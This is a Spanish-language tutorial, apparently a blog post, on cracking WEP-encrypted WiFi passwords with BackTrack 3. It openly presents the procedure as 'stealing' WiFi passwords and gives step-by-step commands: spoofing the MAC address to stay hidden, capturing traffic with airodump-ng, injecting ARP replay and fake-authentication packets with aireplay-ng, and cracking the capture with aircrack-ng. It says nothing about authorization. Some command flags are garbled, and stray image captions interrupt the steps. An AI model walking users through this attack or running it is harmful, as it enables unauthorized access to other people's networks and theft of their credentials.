El día de hoy, vamos a ver como sacar contraseñas WiFi, en este caso una contraseña con encriptación WEP.

1. Lo primero que debemos hacer es descargar Backtrack 3.
Descagar Aquí
http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd
2. Luego grabamos la imagen en un CD, para esto podemos utilizar un programa gratuito como ISO recorder 2.0. Descargar Aquí
http://iso-recorder.softonic.com/
3. Una vez con el cd grabado, reiniciamos el computador y ponemos el cd para que arranque BackTrack 3.

Como sacar o "robar" contraseñas WiFi con Backtra

4. Luego abrimos una consola (shell) con el icono que está al lado de la “K” de la esquina inferior izquierda.
5. Detenemos nuestra tarjeta de Red (En este caso una Atheros por lo tanto es ath0)
Escribimos: airmon-ng stop ath0

Wifi

6. Para continuar, cambiamos nuestra MAC (Media Access Control), para ser “ocultados”.
Escribimos: macchanger -m 11:22:33:44:55:66 wifi0

backtrack 3

7. Iniciamos nuestra tarjeta de Red en modo Monitor.
Escribimos: airmon-ng start wifi0

como sacar o "robar" contraseña

8. Ahora nos aseguraremos que todo vaya bien, revisaremos la MAC cambiada y que la tarjeta esté en modo Monitor.
Escribimos: iwconfig

contraseñas de wifi

9. Ahora, a revisar si hay redes cerca nuestro.
Escribimos: airodump-ng wifi0

Como sacar o "robar" contraseñas WiFi con Backtra

10. Anotemos datos muy importantes de la pantalla anterior, como lo son:

* La MAC de la red (BSSID)
* El canal por donde se transmite la red WiFi (CH)
* El nombre de la red (ESSID)

11. Presionamos CTRL+C y así se detendrá la búsqueda de redes cercanas.
Luego escribimos: airodump-ng –channel X –write XXX ath0
x= Canal (CH)
xxx= Nombre para guardar el archivo con información, pongan cualquier nombre, en este caso “pass”

Para este ejemplo sería: airodump-ng –channel 5 –write pass ath0

Wifi

12. Ahora abrimos otra ventana de consola (Shell).
Escribimos lo siguiente: aireplay-ng -3 -b (mac de la red) -h (nuestra mac) ath0

backtrack 3

13. Volvemos a abrir otra ventana de consola (Shell)
Ahora escribimos: aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) ath0

como sacar o "robar" contraseña

14. Ahora debemos esperar a que se obtenga la información suficiente como para saber la contraseña de la red, para esto tenemos que esperar a que los ARP sean altos (más de 50.000).
15. Una vez que tengamos suficiente información (lo sabrás con experiencia, muchos intentos, todo depende de la dificultad de la contraseña), cancelamos lo que teníamos andando presionando CTRL+C en cada consola (Shell).
16. Luego iniciamos otro programa para que desencripte la contraseña.
Escribimos: Aircrack-ng pass-01.cap

contraseñas de wifi

Finalmente, ya tenemos la contraseña de la red. BackTrack 3 ha funcionado.

Aclaraciones: Debido a problemas con mi máquina virtual, no he podido poner mis propias imágenes, agradezco este tutorial encontrado en Internet. A pesar de que no son mis imágenes, si he hecho estos pasos pero con una tarjeta Ralink.

VINCULO DE DESCARGA http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd

fUENTE DE LAS IMAGENES : http://48kb.com/wp-content/uploads/2009/04/12-21.jpg